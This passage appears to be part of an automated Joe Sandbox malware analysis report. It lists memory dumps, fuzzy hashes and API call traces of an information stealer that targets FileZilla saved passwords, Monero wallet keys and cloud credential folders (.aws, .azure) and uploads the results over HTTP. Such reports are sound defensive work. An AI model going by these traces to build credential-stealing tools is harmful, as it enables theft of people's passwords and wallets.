                                    • Instruction ID: 071fb9c24a8b04990dc219a8e240f8fd2df28bf6010536393c004643a26e46f0
                                    • Opcode Fuzzy Hash: 62a5843d9c34820c897cf532d0a037371490d7953527180a91869ad6d61a2abd
                                    • Instruction Fuzzy Hash: EE51B1F3E085105FF3046A29EC4577BB7D6EBD4320F1A463DEAD893780E9399C058696
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                     • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 416fb05ab863a4fb1250bf2a33698c6ebd4e9719298f9c1ad38de386fc2dedba
                                    • Instruction ID: 01b042ca2ca4443adb105b299cb5e0d0113af665bbb0909c1fbba7381433e107
                                    • Opcode Fuzzy Hash: 416fb05ab863a4fb1250bf2a33698c6ebd4e9719298f9c1ad38de386fc2dedba
                                    • Instruction Fuzzy Hash: 035102F3F186000BF304593EEDC6366B6D7EBE4320F2B423D9A99C7784E87A48064186
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                     • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: af0ca970d46086689ddeea6465da576a17b742ba19458afe68072b1778e07ac4
                                    • Instruction ID: 05fa221571c1e30b9e2dff1b15327e39e0efefb97b5a88372ce0f7e8b9fb8ca8
                                    • Opcode Fuzzy Hash: af0ca970d46086689ddeea6465da576a17b742ba19458afe68072b1778e07ac4
                                    • Instruction Fuzzy Hash: C95139F3A082009FF3545E19EC847AABBD6EBD4320F16463DDB98C73C0D93E58058696
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                     • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 22b6e17d758bf08d203e4935fbdddf3ed8b57cc58d66fe990f147a79d0944d7c
                                    • Instruction ID: b00097125d594c8825a3888727e676e0ef1b19122fc487ff07b1a698c2a8aace
                                    • Opcode Fuzzy Hash: 22b6e17d758bf08d203e4935fbdddf3ed8b57cc58d66fe990f147a79d0944d7c
                                    • Instruction Fuzzy Hash: 8A2150B210C6049FE319FE69DC86BBAB7E5EF48321F02492DE6D5C3750DA3594408A97
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                     • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 00098DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00098E0B
                                      • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                      • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                      • Part of subcall function 000899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000899EC
                                      • Part of subcall function 000899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00089A11
                                      • Part of subcall function 000899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00089A31
                                      • Part of subcall function 000899C0: ReadFile.KERNEL32(000000FF,?,00000000,0008148F,00000000), ref: 00089A5A
                                      • Part of subcall function 000899C0: LocalFree.KERNEL32(0008148F), ref: 00089A90
                                      • Part of subcall function 000899C0: CloseHandle.KERNEL32(000000FF), ref: 00089A9A
                                      • Part of subcall function 00098E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00098E52
                                    • GetProcessHeap.KERNEL32(00000000,000F423F,000A0DBA,000A0DB7,000A0DB6,000A0DB3), ref: 00090362
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00090369
                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 00090385
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A0DB2), ref: 00090393
                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 000903CF
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A0DB2), ref: 000903DD
                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 00090419
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A0DB2), ref: 00090427
                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00090463
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A0DB2), ref: 00090475
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A0DB2), ref: 00090502
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A0DB2), ref: 0009051A
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A0DB2), ref: 00090532
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A0DB2), ref: 0009054A
                                    • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00090562
                                    • lstrcat.KERNEL32(?,profile: null), ref: 00090571
                                    • lstrcat.KERNEL32(?,url: ), ref: 00090580
                                    • lstrcat.KERNEL32(?,00000000), ref: 00090593
                                    • lstrcat.KERNEL32(?,000A1678), ref: 000905A2
                                    • lstrcat.KERNEL32(?,00000000), ref: 000905B5
                                    • lstrcat.KERNEL32(?,000A167C), ref: 000905C4
                                    • lstrcat.KERNEL32(?,login: ), ref: 000905D3
                                    • lstrcat.KERNEL32(?,00000000), ref: 000905E6
                                    • lstrcat.KERNEL32(?,000A1688), ref: 000905F5
                                    • lstrcat.KERNEL32(?,password: ), ref: 00090604
                                    • lstrcat.KERNEL32(?,00000000), ref: 00090617
                                    • lstrcat.KERNEL32(?,000A1698), ref: 00090626
                                    • lstrcat.KERNEL32(?,000A169C), ref: 00090635
                                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A0DB2), ref: 0009068E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 1942843190-555421843
                                    • Opcode ID: f4922ff3eba11b0cbfec9a467640ea3c783b1f1a55edbd76a4eb99a8160386bb
                                    • Instruction ID: 26a71375fe7cf59646eeb0f5a46f1f78dd055a55f5bd2fe3c539a21402777595
                                    • Opcode Fuzzy Hash: f4922ff3eba11b0cbfec9a467640ea3c783b1f1a55edbd76a4eb99a8160386bb
                                    • Instruction Fuzzy Hash: F7D11271A10108ABCF04FBF4DD9AEEEB778BF55300F544518F502A6192DF74AA09DBA2
                                    APIs
                                      • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                      • Part of subcall function 000847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00084839
                                      • Part of subcall function 000847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00084849
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 000859F8
                                    • StrCmpCA.SHLWAPI(?,00D3FCE0), ref: 00085A13
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00085B93
                                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00D3FCB0,00000000,?,00D3EEC0,00000000,?,000A1A1C), ref: 00085E71
                                    • lstrlen.KERNEL32(00000000), ref: 00085E82
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00085E93
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00085E9A
                                    • lstrlen.KERNEL32(00000000), ref: 00085EAF
                                    • lstrlen.KERNEL32(00000000), ref: 00085ED8
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00085EF1
                                    • lstrlen.KERNEL32(00000000,?,?), ref: 00085F1B
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00085F2F
                                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00085F4C
                                    • InternetCloseHandle.WININET(00000000), ref: 00085FB0
                                    • InternetCloseHandle.WININET(00000000), ref: 00085FBD
                                    • HttpOpenRequestA.WININET(00000000,00D3FC80,?,00D3F488,00000000,00000000,00400100,00000000), ref: 00085BF8
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                      • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                      • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                    • InternetCloseHandle.WININET(00000000), ref: 00085FC7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 874700897-2180234286
                                    • Opcode ID: ec2d5cf6aa3bda60b11e0a5976da56f14f62a6a1860e9bdf1f0abef04c4336c4
                                    • Instruction ID: 01ad0608136a4458954159b11eae316532c0e78bc1811adb73275fc2185d33b9
                                    • Opcode Fuzzy Hash: ec2d5cf6aa3bda60b11e0a5976da56f14f62a6a1860e9bdf1f0abef04c4336c4
                                    • Instruction Fuzzy Hash: 8A12F171920128ABDF15EBA0DC95FEEB378BF15700F504199F10A66092EF702B49DFA6
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                      • Part of subcall function 00098B60: GetSystemTime.KERNEL32(000A0E1A,00D3EEF0,000A05AE,?,?,000813F9,?,0000001A,000A0E1A,00000000,?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 00098B86
                                      • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                      • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0008CF83
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0008D0C7
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0008D0CE
                                    • lstrcat.KERNEL32(?,00000000), ref: 0008D208
                                    • lstrcat.KERNEL32(?,000A1478), ref: 0008D217
                                    • lstrcat.KERNEL32(?,00000000), ref: 0008D22A
                                    • lstrcat.KERNEL32(?,000A147C), ref: 0008D239
                                    • lstrcat.KERNEL32(?,00000000), ref: 0008D24C
                                    • lstrcat.KERNEL32(?,000A1480), ref: 0008D25B
                                    • lstrcat.KERNEL32(?,00000000), ref: 0008D26E
                                    • lstrcat.KERNEL32(?,000A1484), ref: 0008D27D
                                    • lstrcat.KERNEL32(?,00000000), ref: 0008D290
                                    • lstrcat.KERNEL32(?,000A1488), ref: 0008D29F
                                    • lstrcat.KERNEL32(?,00000000), ref: 0008D2B2
                                    • lstrcat.KERNEL32(?,000A148C), ref: 0008D2C1
                                    • lstrcat.KERNEL32(?,00000000), ref: 0008D2D4
                                    • lstrcat.KERNEL32(?,000A1490), ref: 0008D2E3
                                      • Part of subcall function 0009A820: lstrlen.KERNEL32(00084F05,?,?,00084F05,000A0DDE), ref: 0009A82B
                                      • Part of subcall function 0009A820: lstrcpy.KERNEL32(000A0DDE,00000000), ref: 0009A885
                                    • lstrlen.KERNEL32(?), ref: 0008D32A
                                    • lstrlen.KERNEL32(?), ref: 0008D339
                                      • Part of subcall function 0009AA70: StrCmpCA.SHLWAPI(00D38C28,0008A7A7,?,0008A7A7,00D38C28), ref: 0009AA8F
                                    • DeleteFileA.KERNEL32(00000000), ref: 0008D3B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                    • String ID:
                                    • API String ID: 1956182324-0
                                    • Opcode ID: e2017d07ad5d889e9eb3ebfa77898b83af28c8001bd0dbfb296365f5ad6a13e1
                                    • Instruction ID: 9f91a894d96f6b8abc57c70f1f32c4f30cb7aaddbdd5b8d7c76b6170fe01af7b
                                    • Opcode Fuzzy Hash: e2017d07ad5d889e9eb3ebfa77898b83af28c8001bd0dbfb296365f5ad6a13e1
                                    • Instruction Fuzzy Hash: 2AE10171A10118ABCF04FBA0ED9AEEE7378BF15305F104159F507A6092DF35AE09DBA6
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                      • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00D3DE98,00000000,?,000A144C,00000000,?,?), ref: 0008CA6C
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0008CA89
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0008CA95
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0008CAA8
                                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0008CAD9
                                    • StrStrA.SHLWAPI(?,00D3DE20,000A0B52), ref: 0008CAF7
                                    • StrStrA.SHLWAPI(00000000,00D3DE38), ref: 0008CB1E
                                    • StrStrA.SHLWAPI(?,00D3E148,00000000,?,000A1458,00000000,?,00000000,00000000,?,00D38C08,00000000,?,000A1454,00000000,?), ref: 0008CCA2
                                    • StrStrA.SHLWAPI(00000000,00D3E368), ref: 0008CCB9
                                      • Part of subcall function 0008C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0008C871
                                      • Part of subcall function 0008C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0008C87C
                                    • StrStrA.SHLWAPI(?,00D3E368,00000000,?,000A145C,00000000,?,00000000,00D38C18), ref: 0008CD5A
                                    • StrStrA.SHLWAPI(00000000,00D38A58), ref: 0008CD71
                                      • Part of subcall function 0008C820: lstrcat.KERNEL32(?,000A0B46), ref: 0008C943
                                      • Part of subcall function 0008C820: lstrcat.KERNEL32(?,000A0B47), ref: 0008C957
                                      • Part of subcall function 0008C820: lstrcat.KERNEL32(?,000A0B4E), ref: 0008C978
                                    • lstrlen.KERNEL32(00000000), ref: 0008CE44
                                    • CloseHandle.KERNEL32(00000000), ref: 0008CE9C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                    • String ID:
                                    • API String ID: 3744635739-3916222277
                                    • Opcode ID: 120ba5d3f9a8d588670c262437df43999f77a017c989a3f2d1d134199310405e
                                    • Instruction ID: c23e98dd32a0bfed1980315be111de9931213fa7f692b6c758d7485178a40c47
                                    • Opcode Fuzzy Hash: 120ba5d3f9a8d588670c262437df43999f77a017c989a3f2d1d134199310405e
                                    • Instruction Fuzzy Hash: D0E1FD71A10118ABDF14EBA4EC96FEFB778BF15304F404159F10667192EF306A4ADBA2
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                    • RegOpenKeyExA.ADVAPI32(00000000,00D3C110,00000000,00020019,00000000,000A05B6), ref: 000983A4
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00098426
                                    • wsprintfA.USER32 ref: 00098459
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0009847B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0009848C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00098499
                                      • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenlstrcpy$Enumwsprintf
                                    • String ID: - $%s\%s$?
                                    • API String ID: 3246050789-3278919252
                                    • Opcode ID: 79a3144cd659da5532454cc30e5b4d294da1fab59bcef9757c56aec5c9eb5717
                                    • Instruction ID: b30e5b9cca1dc3f8279136f65e1e3d3c2f3298e61c6bf0c68195291e9900eca7
                                    • Opcode Fuzzy Hash: 79a3144cd659da5532454cc30e5b4d294da1fab59bcef9757c56aec5c9eb5717
                                    • Instruction Fuzzy Hash: 4F81097191012CABDF24DB60DD95FEAB7B8BF09704F008299E109A6181DF716B89DFE1
                                    APIs
                                      • Part of subcall function 00098DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00098E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00094DB0
                                    • lstrcat.KERNEL32(?,\.azure\), ref: 00094DCD
                                      • Part of subcall function 00094910: wsprintfA.USER32 ref: 0009492C
                                      • Part of subcall function 00094910: FindFirstFileA.KERNEL32(?,?), ref: 00094943
                                    • lstrcat.KERNEL32(?,00000000), ref: 00094E3C
                                    • lstrcat.KERNEL32(?,\.aws\), ref: 00094E59
                                      • Part of subcall function 00094910: StrCmpCA.SHLWAPI(?,000A0FDC), ref: 00094971
                                      • Part of subcall function 00094910: StrCmpCA.SHLWAPI(?,000A0FE0), ref: 00094987
                                      • Part of subcall function 00094910: FindNextFileA.KERNEL32(000000FF,?), ref: 00094B7D
                                      • Part of subcall function 00094910: FindClose.KERNEL32(000000FF), ref: 00094B92
                                    • lstrcat.KERNEL32(?,00000000), ref: 00094EC8
                                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00094EE5
                                      • Part of subcall function 00094910: wsprintfA.USER32 ref: 000949B0
                                      • Part of subcall function 00094910: StrCmpCA.SHLWAPI(?,000A08D2), ref: 000949C5
                                      • Part of subcall function 00094910: wsprintfA.USER32 ref: 000949E2
                                      • Part of subcall function 00094910: PathMatchSpecA.SHLWAPI(?,?), ref: 00094A1E
                                      • Part of subcall function 00094910: lstrcat.KERNEL32(?,00D3FCD0), ref: 00094A4A
                                      • Part of subcall function 00094910: lstrcat.KERNEL32(?,000A0FF8), ref: 00094A5C
                                      • Part of subcall function 00094910: lstrcat.KERNEL32(?,?), ref: 00094A70
                                      • Part of subcall function 00094910: lstrcat.KERNEL32(?,000A0FFC), ref: 00094A82
                                      • Part of subcall function 00094910: lstrcat.KERNEL32(?,?), ref: 00094A96
                                      • Part of subcall function 00094910: CopyFileA.KERNEL32(?,?,00000001), ref: 00094AAC
                                      • Part of subcall function 00094910: DeleteFileA.KERNEL32(?), ref: 00094B31
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                     • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
